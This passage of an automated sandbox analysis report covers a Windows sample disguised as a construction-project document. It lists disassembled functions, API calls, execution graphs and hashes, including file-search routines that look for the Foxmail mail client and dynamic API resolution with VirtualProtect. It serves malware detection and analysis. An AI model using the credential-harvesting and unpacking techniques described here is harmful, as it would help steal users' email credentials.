                                                                                                                          • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                                                                          • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                                          • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                                                                          Function 00405B5D Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D97,00000000,[Rename],00000000,00000000,00000000), ref: 00405B6D
                                                                                                                          • lstrcmpiA.KERNEL32(00405D97,00000000), ref: 00405B85
                                                                                                                          • CharNextA.USER32(00405D97,?,00000000,00405D97,00000000,[Rename],00000000,00000000,00000000), ref: 00405B96
                                                                                                                          • lstrlenA.KERNEL32(00405D97,?,00000000,00405D97,00000000,[Rename],00000000,00000000,00000000), ref: 00405B9F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 190613189-0
                                                                                                                          • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                                          • Instruction ID: 495cf0b23cfe7cb5471ae9193bfc392c37a901cc734ec181b4002dd8df2403ac
                                                                                                                          • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                                          • Instruction Fuzzy Hash: 56F0CD32604458AFC7129FA8CD00D9EBBB8EF06250B2140AAF801F7221D634FE019BA9

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:1.8%
                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                          Signature Coverage:0.5%
                                                                                                                          Total number of Nodes:213
                                                                                                                          Total number of Limit Nodes:5
                                                                                                                          execution_graph 8505 332b1c5b 8506 332b1c6b ___scrt_fastfail 8505->8506 8509 332b12ee 8506->8509 8508 332b1c87 8510 332b1324 ___scrt_fastfail 8509->8510 8511 332b13b7 GetEnvironmentVariableW 8510->8511 8535 332b10f1 8511->8535 8514 332b10f1 57 API calls 8515 332b1465 8514->8515 8516 332b10f1 57 API calls 8515->8516 8517 332b1479 8516->8517 8518 332b10f1 57 API calls 8517->8518 8519 332b148d 8518->8519 8520 332b10f1 57 API calls 8519->8520 8521 332b14a1 8520->8521 8522 332b10f1 57 API calls 8521->8522 8523 332b14b5 lstrlenW 8522->8523 8524 332b14d9 lstrlenW 8523->8524 8534 332b14d2 8523->8534 8525 332b10f1 57 API calls 8524->8525 8526 332b1501 lstrlenW lstrcatW 8525->8526 8527 332b10f1 57 API calls 8526->8527 8528 332b1539 lstrlenW lstrcatW 8527->8528 8529 332b10f1 57 API calls 8528->8529 8530 332b156b lstrlenW lstrcatW 8529->8530 8531 332b10f1 57 API calls 8530->8531 8532 332b159d lstrlenW lstrcatW 8531->8532 8533 332b10f1 57 API calls 8532->8533 8533->8534 8534->8508 8536 332b1118 ___scrt_fastfail 8535->8536 8537 332b1129 lstrlenW 8536->8537 8548 332b2c40 8537->8548 8540 332b1168 lstrlenW 8541 332b1177 lstrlenW FindFirstFileW 8540->8541 8542 332b11e1 8541->8542 8543 332b11a0 8541->8543 8542->8514 8544 332b11aa 8543->8544 8545 332b11c7 FindNextFileW 8543->8545 8544->8545 8550 332b1000 8544->8550 8545->8543 8546 332b11da FindClose 8545->8546 8546->8542 8549 332b1148 lstrcatW lstrlenW 8548->8549 8549->8540 8549->8541 8551 332b1022 ___scrt_fastfail 8550->8551 8552 332b10af 8551->8552 8553 332b102f lstrcatW lstrlenW 8551->8553 8554 332b10b5 lstrlenW 8552->8554 8565 332b10ad 8552->8565 8555 332b106b lstrlenW 8553->8555 8556 332b105a lstrlenW 8553->8556 8581 332b1e16 8554->8581 8567 332b1e89 lstrlenW 8555->8567 8556->8555 8559 332b1088 GetFileAttributesW 8561 332b109c 8559->8561 8559->8565 8560 332b10ca 8562 332b1e89 5 API calls 8560->8562 8560->8565 8561->8565 8573 332b173a 8561->8573 8564 332b10df 8562->8564 8586 332b11ea 8564->8586 8565->8544 8568 332b2c40 ___scrt_fastfail 8567->8568 8569 332b1ea7 lstrcatW lstrlenW 8568->8569 8570 332b1ec2 8569->8570 8571 332b1ed1 lstrcatW 8569->8571 8570->8571 8572 332b1ec7 lstrlenW 8570->8572 8571->8559 8572->8571 8574 332b1747 ___scrt_fastfail 8573->8574 8601 332b1cca 8574->8601 8577 332b199f 8577->8565 8579 332b1824 ___scrt_fastfail _strlen 8579->8577 8621 332b15da 8579->8621 8582 332b1e29 8581->8582 8585 332b1e4c 8581->8585 8583 332b1e2d lstrlenW 8582->8583 8582->8585 8584 332b1e3f lstrlenW 8583->8584 8583->8585 8584->8585 8585->8560 8587 332b120e ___scrt_fastfail 8586->8587 8588 332b1e89 5 API calls 8587->8588 8589 332b1220 GetFileAttributesW 8588->8589 8590 332b1246 8589->8590 8591 332b1235 8589->8591 8592 332b1e89 5 API calls 8590->8592 8591->8590 8593 332b173a 35 API calls 8591->8593 8594 332b1258 8592->8594 8593->8590 8595 332b10f1 56 API calls 8594->8595 8596 332b126d 8595->8596 8597 332b1e89 5 API calls 8596->8597 8598 332b127f ___scrt_fastfail 8597->8598 8599 332b10f1 56 API calls 8598->8599 8600 332b12e6 8599->8600 8600->8565 8602 332b1cf1 ___scrt_fastfail 8601->8602 8603 332b1d0f CopyFileW CreateFileW 8602->8603 8604 332b1d55 GetFileSize 8603->8604 8605 332b1d44 DeleteFileW 8603->8605 8606 332b1ede 22 API calls 8604->8606 8610 332b1808 8605->8610 8607 332b1d66 ReadFile 8606->8607 8608 332b1d7d CloseHandle DeleteFileW 8607->8608 8609 332b1d94 CloseHandle DeleteFileW 8607->8609 8608->8610 8609->8610 8610->8577 8611 332b1ede 8610->8611 8613 332b222f 8611->8613 8614 332b224e 8613->8614 8617 332b2250 8613->8617 8629 332b474f 8613->8629 8634 332b47e5 8613->8634 8614->8579 8616 332b2908 8618 332b35d2 __CxxThrowException@8 RaiseException 8616->8618 8617->8616 8641 332b35d2 8617->8641 8619 332b2925 8618->8619 8619->8579 8622 332b160c _strlen 8621->8622 8623 332b163c lstrlenW 8622->8623 8729 332b1c9d 8623->8729 8625 332b1655 lstrcatW lstrlenW 8626 332b1678 8625->8626 8627 332b167e lstrcatW 8626->8627 8628 332b1693 ___scrt_fastfail 8626->8628 8627->8628 8628->8579 8644 332b4793 8629->8644 8632 332b478f 8632->8613 8633 332b4765 8650 332b2ada 8633->8650 8639 332b56d0 _abort 8634->8639 8635 332b570e 8663 332b6368 8635->8663 8637 332b56f9 RtlAllocateHeap 8638 332b570c 8637->8638 8637->8639 8638->8613 8639->8635 8639->8637 8640 332b474f _abort 7 API calls 8639->8640 8640->8639 8643 332b35f2 RaiseException 8641->8643 8643->8616 8645 332b479f ___scrt_is_nonwritable_in_current_image 8644->8645 8657 332b5671 RtlEnterCriticalSection 8645->8657 8647 332b47aa 8658 332b47dc 8647->8658 8649 332b47d1 _abort 8649->8633 8651 332b2ae3 8650->8651 8652 332b2ae5 IsProcessorFeaturePresent 8650->8652 8651->8632 8654 332b2b58 8652->8654 8662 332b2b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8654->8662 8656 332b2c3b 8656->8632 8657->8647 8661 332b56b9 RtlLeaveCriticalSection 8658->8661 8660 332b47e3 8660->8649 8661->8660 8662->8656 8666 332b5b7a GetLastError 8663->8666 8667 332b5b99 8666->8667 8668 332b5b93 8666->8668 8672 332b5bf0 SetLastError 8667->8672 8692 332b637b 8667->8692 8685 332b5e08 8668->8685 8673 332b5bf9 8672->8673 8673->8638 8677 332b5bcf 8712 332b593c 8677->8712 8678 332b5bb3 8699 332b571e 8678->8699 8679 332b5bb9 8681 332b5be7 SetLastError 8679->8681 8681->8673 8683 332b571e _free 17 API calls 8684 332b5be0 8683->8684 8684->8672 8684->8681 8717 332b5c45 8685->8717 8687 332b5e2f 8688 332b5e47 TlsGetValue 8687->8688 8689 332b5e3b 8687->8689 8688->8689 8690 332b2ada _ValidateLocalCookies 5 API calls 8689->8690 8691 332b5e58 8690->8691 8691->8667 8697 332b6388 _abort 8692->8697 8693 332b63c8 8695 332b6368 _free 19 API calls 8693->8695 8694 332b63b3 RtlAllocateHeap 8696 332b5bab 8694->8696 8694->8697 8695->8696 8696->8678 8705 332b5e5e 8696->8705 8697->8693 8697->8694 8698 332b474f _abort 7 API calls 8697->8698 8698->8697 8700 332b5729 HeapFree 8699->8700 8701 332b5752 _free 8699->8701 8700->8701 8702 332b573e 8700->8702 8701->8679 8703 332b6368 _free 18 API calls 8702->8703 8704 332b5744 GetLastError 8703->8704 8704->8701 8706 332b5c45 _abort 5 API calls 8705->8706 8707 332b5e85 8706->8707 8708 332b5ea0 TlsSetValue 8707->8708 8709 332b5e94 8707->8709 8708->8709 8710 332b2ada _ValidateLocalCookies 5 API calls 8709->8710 8711 332b5bc8 8710->8711 8711->8677 8711->8678 8723 332b5914 8712->8723 8720 332b5c71 8717->8720 8722 332b5c75 __crt_fast_encode_pointer 8717->8722 8718 332b5c95 8721 332b5ca1 GetProcAddress 8718->8721 8718->8722 8719 332b5ce1 _abort LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 8719->8720 8720->8718 8720->8719 8720->8722 8721->8722 8722->8687 8724 332b5854 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 8723->8724 8725 332b5938 8724->8725 8726 332b58c4 8725->8726 8727 332b5758 _abort 20 API calls 8726->8727 8728 332b58e8 8727->8728 8728->8683 8730 332b1ca6 _strlen 8729->8730 8730->8625 8731 332bc7c4 8742 332bc7e6 GetModuleHandleA 8731->8742 8733 332bc85f GetProcAddress 8735 332bc82c 8733->8735 8734 332bc7dd 8734->8735 8736 332bc800 GetProcAddress 8734->8736 8738 332bc83f 8734->8738 8735->8738 8740 332bc872 LdrInitializeThunk 8735->8740 8741 332bc835 GetModuleHandleA 8735->8741 8736->8735 8737 332bc80d VirtualProtect 8736->8737 8737->8735 8739 332bc81c VirtualProtect 8737->8739 8738->8733 8738->8735 8739->8735 8741->8738 8743 332bc7ef 8742->8743 8750 332bc82c 8742->8750 8754 332bc803 GetProcAddress 8743->8754 8745 332bc7f4 8748 332bc800 GetProcAddress 8745->8748 8745->8750 8746 332bc872 LdrInitializeThunk 8747 332bc835 GetModuleHandleA 8752 332bc83f 8747->8752 8749 332bc80d VirtualProtect 8748->8749 8748->8750 8749->8750 8751 332bc81c VirtualProtect 8749->8751 8750->8746 8750->8747 8750->8752 8751->8750 8752->8750 8753 332bc85f GetProcAddress 8752->8753 8753->8750 8755 332bc82c 8754->8755 8756 332bc80d VirtualProtect 8754->8756 8758 332bc872 LdrInitializeThunk 8755->8758 8759 332bc835 GetModuleHandleA 8755->8759 8756->8755 8757 332bc81c VirtualProtect 8756->8757 8757->8755 8761 332bc83f 8759->8761 8760 332bc85f GetProcAddress 8760->8761 8761->8755 8761->8760

                                                                                                                          Executed Functions

                                                                                                                          Function 332B10F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 332B1137
                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 332B1151
                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 332B115C
                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 332B116D
                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 332B117C
                                                                                                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 332B1193
                                                                                                                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 332B11D0
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 332B11DB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1083526818-0
                                                                                                                          • Opcode ID: b921de05a7f91cc8ca918e329d1566bf1c0ba254fbc38d2a83a7b9ae5f555f4e
                                                                                                                          • Instruction ID: 7091c4ed7f00ec8be3184de602fc0cf00c1cb522b6b1ce954837553bf64aa633
                                                                                                                          • Opcode Fuzzy Hash: b921de05a7f91cc8ca918e329d1566bf1c0ba254fbc38d2a83a7b9ae5f555f4e
                                                                                                                          • Instruction Fuzzy Hash: 4C2193729043096BDB10EA64DC4CFDB7BECEF84754F040D2AB968D3190EB70D6458796
                                                                                                                          Function 332B12EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,?), ref: 332B1434
                                                                                                                            • Part of subcall function 332B10F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 332B1137
                                                                                                                            • Part of subcall function 332B10F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 332B1151
                                                                                                                            • Part of subcall function 332B10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 332B115C
                                                                                                                            • Part of subcall function 332B10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 332B116D
                                                                                                                            • Part of subcall function 332B10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 332B117C
                                                                                                                            • Part of subcall function 332B10F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 332B1193
                                                                                                                            • Part of subcall function 332B10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 332B11D0
                                                                                                                            • Part of subcall function 332B10F1: FindClose.KERNEL32(00000000), ref: 332B11DB
                                                                                                                          • lstrlenW.KERNEL32(?), ref: 332B14C5
                                                                                                                          • lstrlenW.KERNEL32(?), ref: 332B14E0
                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 332B150F
                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 332B1521
                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 332B1547
                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 332B1553
                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 332B1579
                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 332B1585
                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 332B15AB
                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 332B15B7
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                          • String ID: )$Foxmail$ProgramFiles
                                                                                                                          • API String ID: 672098462-2938083778
                                                                                                                          • Opcode ID: e7d69b030bb6ee66821187f386dd082b2853d8ea62ee13b2bacbb1cc0433596d
                                                                                                                          • Instruction ID: 34c67aabcd4ecea6978e7ba541df364e10a2593e8436c53000f3863e80f2a3bf
                                                                                                                          • Opcode Fuzzy Hash: e7d69b030bb6ee66821187f386dd082b2853d8ea62ee13b2bacbb1cc0433596d
                                                                                                                          • Instruction Fuzzy Hash: AA81B275A00358A9DF20DBA1DC45FDE7379EF84740F000596F909E7190EAB26AC5CF95
                                                                                                                          Function 332BC7E6 Relevance: 9.1, APIs: 6, Instructions: 70libraryloaderCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • GetModuleHandleA.KERNEL32(332BC7DD), ref: 332BC7E6
                                                                                                                          • GetModuleHandleA.KERNEL32(?,332BC7DD), ref: 332BC838
                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 332BC860
                                                                                                                            • Part of subcall function 332BC803: GetProcAddress.KERNEL32(00000000,332BC7F4), ref: 332BC804
                                                                                                                            • Part of subcall function 332BC803: VirtualProtect.KERNEL32(?,?,?,?,00000000,00000000,332BC7F4,332BC7DD), ref: 332BC816
                                                                                                                            • Part of subcall function 332BC803: VirtualProtect.KERNEL32(?,?,?,?,?,00000000,00000000,332BC7F4,332BC7DD), ref: 332BC82A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2099061454-0
                                                                                                                          • Opcode ID: 0d40a1f1873badcc7abd17615b577454aacf23acbaf30437919bc32e48719f70
                                                                                                                          • Instruction ID: d2a714f0ada7dfff2ed40ae0bc70c36ec567e3ac6be975a87674b309ba8f2a99
                                                                                                                          • Opcode Fuzzy Hash: 0d40a1f1873badcc7abd17615b577454aacf23acbaf30437919bc32e48719f70
                                                                                                                          • Instruction Fuzzy Hash: 3211215094537238FF1356782C04AAA6FFC9B232E0F181766A180CA483D9E085C583E6
                                                                                                                          Function 332BC7C4 Relevance: 7.6, APIs: 5, Instructions: 84COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 79 332bc7c4-332bc7f6 call 332bc7e6 82 332bc7f8 79->82 83 332bc86c 79->83 85 332bc85b-332bc85e 82->85 86 332bc7fa-332bc7fc 82->86 84 332bc86d-332bc86e 83->84 88 332bc870 84->88 89 332bc866-332bc86b 84->89 87 332bc85f-332bc860 GetProcAddress 85->87 86->84 90 332bc7fe 86->90 91 332bc865 87->91 93 332bc849-332bc84c 88->93 89->83 90->91 92 332bc800-332bc80b GetProcAddress 90->92 91->89 94 332bc82d 92->94 95 332bc80d-332bc81a VirtualProtect 92->95 96 332bc82f-332bc833 93->96 97 332bc84e-332bc850 93->97 94->96 98 332bc82c 95->98 99 332bc81c-332bc82a VirtualProtect 95->99 100 332bc872 LdrInitializeThunk 96->100 101 332bc835-332bc83d GetModuleHandleA 96->101 102 332bc852-332bc854 97->102 103 332bc856-332bc85a 97->103 98->94 99->98 104 332bc83f-332bc847 101->104 102->87 103->85 104->93 104->104
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2099061454-0
                                                                                                                          • Opcode ID: 3e908f2ecaa81469cdc02b0ad555967abb4b048711ac79a921ad9b24b7d5fded
                                                                                                                          • Instruction ID: 04d1a75d2f5c57739ac2da86264f86abccdb1d7ff4ba666c333c320904956ece
                                                                                                                          • Opcode Fuzzy Hash: 3e908f2ecaa81469cdc02b0ad555967abb4b048711ac79a921ad9b24b7d5fded
                                                                                                                          • Instruction Fuzzy Hash: FB1106955093A26EFF1347742C44AB66FFE8B572E4F1C069AD080CB583D5A084C5D3B6
                                                                                                                          Function 332BC803 Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 105 332bc803-332bc80b GetProcAddress 106 332bc82d 105->106 107 332bc80d-332bc81a VirtualProtect 105->107 110 332bc82f-332bc833 106->110 108 332bc82c 107->108 109 332bc81c-332bc82a VirtualProtect 107->109 108->106 109->108 111 332bc872 LdrInitializeThunk 110->111 112 332bc835-332bc83d GetModuleHandleA 110->112 113 332bc83f-332bc847 112->113 113->113 114 332bc849-332bc84c 113->114 114->110 115 332bc84e-332bc850 114->115 116 332bc852-332bc854 115->116 117 332bc856-332bc85e 115->117 119 332bc85f-332bc865 GetProcAddress 116->119 117->119 121 332bc866-332bc86e 119->121 124 332bc870 121->124 124->114
                                                                                                                          APIs
                                                                                                                          • GetProcAddress.KERNEL32(00000000,332BC7F4), ref: 332BC804
                                                                                                                          • VirtualProtect.KERNEL32(?,?,?,?,00000000,00000000,332BC7F4,332BC7DD), ref: 332BC816
                                                                                                                          • VirtualProtect.KERNEL32(?,?,?,?,?,00000000,00000000,332BC7F4,332BC7DD), ref: 332BC82A
                                                                                                                          • GetModuleHandleA.KERNEL32(?,332BC7DD), ref: 332BC838
                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 332BC860
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2152742572-0
                                                                                                                          • Opcode ID: 9140eaa08c5d122f984b313d2600f35573c21d4dae5556e03d594b9c17f04e83
                                                                                                                          • Instruction ID: 301fa9788fba3ef564ba7c9321e85070ceb65b39a50e6d33030aed414f65bdf0
                                                                                                                          • Opcode Fuzzy Hash: 9140eaa08c5d122f984b313d2600f35573c21d4dae5556e03d594b9c17f04e83
                                                                                                                          • Instruction Fuzzy Hash: 6AF046849453723CFE1341B43C44EB65FFD8B272E0B181A12E180CB183C8E089C683F2

                                                                                                                          Non-executed Functions

                                                                                                                          Function 00404BB0 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 185 404bb0-404bfc GetDlgItem * 2 186 404c02-404c96 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 185->186 187 404e1d-404e24 185->187 188 404ca5-404cac DeleteObject 186->188 189 404c98-404ca3 SendMessageW 186->189 190 404e26-404e36 187->190 191 404e38 187->191 193 404cae-404cb6 188->193 189->188 192 404e3b-404e44 190->192 191->192 194 404e46-404e49 192->194 195 404e4f-404e55 192->195 196 404cb8-404cbb 193->196 197 404cdf-404ce3 193->197 194->195 199 404f33-404f3a 194->199 202 404e64-404e6b 195->202 203 404e57-404e5e 195->203 200 404cc0-404cdd call 405fae SendMessageW * 2 196->200 201 404cbd 196->201 197->193 198 404ce5-404d11 call 40419a * 2 197->198 241 404d17-404d1d 198->241 242 404ddc-404def GetWindowLongW SetWindowLongW 198->242 205 404fab-404fb3 199->205 206 404f3c-404f42 199->206 200->197 201->200 208 404ee0-404ee3 202->208 209 404e6d-404e70 202->209 203->199 203->202 214 404fb5-404fbb SendMessageW 205->214 215 404fbd-404fc4 205->215 211 405193-4051a5 call 404201 206->211 212 404f48-404f52 206->212 208->199 213 404ee5-404eef 208->213 217 404e72-404e79 209->217 218 404e7b-404e90 call 404afe 209->218 212->211 223 404f58-404f67 SendMessageW 212->223 225 404ef1-404efd SendMessageW 213->225 226 404eff-404f09 213->226 214->215 219 404fc6-404fcd 215->219 220 404ff8-404fff 215->220 217->208 217->218 218->208 240 404e92-404ea3 218->240 228 404fd6-404fdd 219->228 229 404fcf-404fd0 ImageList_Destroy 219->229 232 405155-40515c 220->232 233 405005-405011 call 4011ef 220->233 223->211 234 404f6d-404f7e SendMessageW 223->234 225->226 226->199 227 404f0b-404f15 226->227 236 404f26-404f30 227->236 237 404f17-404f24 227->237 238 404fe6-404ff2 228->238 239 404fdf-404fe0 GlobalFree 228->239 229->228 232->211 246 40515e-405165 232->246 259 405021-405024 233->259 260 405013-405016 233->260 244 404f80-404f86 234->244 245 404f88-404f8a 234->245 236->199 237->199 238->220 239->238 240->208 247 404ea5-404ea7 240->247 248 404d20-404d27 241->248 252 404df5-404df9 242->252 244->245 250 404f8b-404fa4 call 401299 SendMessageW 244->250 245->250 246->211 251 405167-405191 ShowWindow GetDlgItem ShowWindow 246->251 255 404ea9-404eb0 247->255 256 404eba 247->256 257 404dbd-404dd0 248->257 258 404d2d-404d55 248->258 250->205 251->211 253 404e13-404e1b call 4041cf 252->253 254 404dfb-404e0e ShowWindow call 4041cf 252->254 253->187 254->211 264 404eb2-404eb4 255->264 265 404eb6-404eb8 255->265 268 404ebd-404ed9 call 40117d 256->268 257->248 272 404dd6-404dda 257->272 266 404d57-404d8d SendMessageW 258->266 267 404d8f-404d91 258->267 273 405065-405089 call 4011ef 259->273 274 405026-40503f call 4012e2 call 401299 259->274 269 405018 260->269 270 405019-40501c call 404b7e 260->270 264->268 265->268 266->257 278 404d93-404da2 SendMessageW 267->278 279 404da4-404dba SendMessageW 267->279 268->208 269->270 270->259 272->242 272->252 287 40512b-40513f InvalidateRect 273->287 288 40508f 273->288 292 405041-405047 274->292 293 40504f-40505e SendMessageW 274->293 278->257 279->257 287->232 290 405141-405150 call 404ad1 call 404ab9 287->290 291 405092-40509d 288->291 290->232 294 405113-405125 291->294 295 40509f-4050ae 291->295 297 405049 292->297 298 40504a-40504d 292->298 293->273 294->287 294->291 300 4050b0-4050bd 295->300 301 4050c1-4050c4 295->301 297->298 298->292 298->293 300->301 302 4050c6-4050c9 301->302 303 4050cb-4050d4 301->303 305 4050d9-405111 SendMessageW * 2 302->305 303->305 306 4050d6 303->306 305->294 306->305
                                                                                                                          APIs
